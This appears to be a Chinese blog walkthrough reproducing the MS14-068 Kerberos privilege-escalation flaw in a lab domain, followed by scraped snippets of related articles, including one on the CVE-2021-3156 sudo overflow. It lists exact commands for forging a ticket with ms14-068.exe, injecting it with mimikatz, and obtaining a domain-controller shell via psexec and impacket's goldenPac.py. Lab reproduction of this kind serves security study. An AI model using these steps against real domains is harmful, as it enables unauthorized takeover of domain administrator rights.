在寫該篇文章之前,本人已經寫過了關於域滲透之**票據和**票據的利用方式,今天的內容也是關於域滲透提權的利用,並且ms14-068這個exp也是由kerberos協議而來。
在實際的滲透過程中,獲得了乙個域成員(非管理員)的賬號後,如果剛好域控機器未打補丁(kb3011780
)這是官方給出的修復補丁,那麼就可以利用ms14-068該exp來快速獲得域控許可權。
1:域使用者和密碼
2:minikatz工具
3:ms14-068.exe
4:08主域控一台和win7域內機器一台
5:kali系統中安裝impacket工具包
第一步:登入win7域成員機器,執行whoami /all獲取sid
將sid號複製下來。
第二步:使用ms14-068.exe
工具生成票據,網上的版本有很多,有py版本的,有windows可執行檔案exe版本的,工具的鏈結本文就不提供了,直接操作,命令如下:
ms14-068 -u 域使用者名稱@網域名稱 -p 域使用者密碼 -s 域sid號 -d 域控主機名第三步:執行成功了以後,會生成乙個
tgt
票據,開啟mimikatz
工具,首先檢視當前票據:kerberos::list
然後清空當前票據:
kerberos::purge
第四步:將生成的tgt票據檔案通過minikatz寫入到記憶體中,命令:
kerberos::ptc c:\users\yukong_user\desktop\[email protected]
,提示ok表示寫入成功,通過kerberos::list
檢視是否生效票據已經成功寫入!
第五步:此時許可權已經是最高許可權,我們可以執行p***ec.exe來判斷,可以看到是可以成功連線,並且此時許可權也是最高的。
ps:本人在復現的時候,由於昨天晚上虛擬機器未關機,所以域控機器自己更新了 補丁,把對應的
kb3011780
補丁給打上了,導致一直復現失敗,後來嘗試直接解除安裝補丁,也無法進行復現,所以就將域控環境重新搭建了,網域名稱也更換為test.com
,最後一張圖裡面表現出來了。第一步:開始的時候也介紹了,在kali下可以利用
impacket工具包裡面的goldenpac.py
利用方式如下python goldenpac.py -dc-ip 1.1.1.1 -target-ip 2.2.2.2 domain.net/normaluser:mypwd@domain-host
-dc-ip
是主域控的ip位址
-target-ip
也是主域控的ip位址
domain.net
是網域名稱 比如:hydra.com
這種的
/
是當前域使用者 比如:yukong_user
:
冒號後面是當前域使用者的密碼
@
後輸入主域計算機名 比如:dc.hydra.com
第二步:執行如下語句,返回cmd互動shell表示利用成功。
MS14 068域提權漏洞復現
目錄 ms14 068域提權漏洞復現 一 漏洞說明 二 漏洞原理 三 漏洞利用前提 四 實驗環境 五 漏洞利用 總結 改漏洞可能允許攻擊者將未經授權的域使用者賬戶的許可權,提權到域管理員的許可權。微軟官方解釋 kerberos認證原理 服務票據是客戶端直接傳送給伺服器,並請求服務資源的。如果伺服器沒...
MS14 068域提權漏洞復現
使用者向金鑰分發中心 key distribution center即kdc 申請票證授予票證 ticket granting ticket即tgt 如果此時宣告自己有域管理員許可權,並且金鑰分發中心沒有做校驗,那麼此時金鑰分發中心就會返回一張票據給tgt,tgt會給票據授予伺服器 ticket g...
CVE 2021 3156 sudo許可權提公升漏洞
漏洞詳情 sudo是乙個功能強大的工具,其允許普通使用者執行root許可權命令,大多數基於unix和linux的作業系統都包含sudo。2021年01月26日,sudo被披露存在乙個基於堆的緩衝區溢位漏洞 cve 2021 3156,該漏洞被命名為 baron samedit 可導致本地許可權提公升...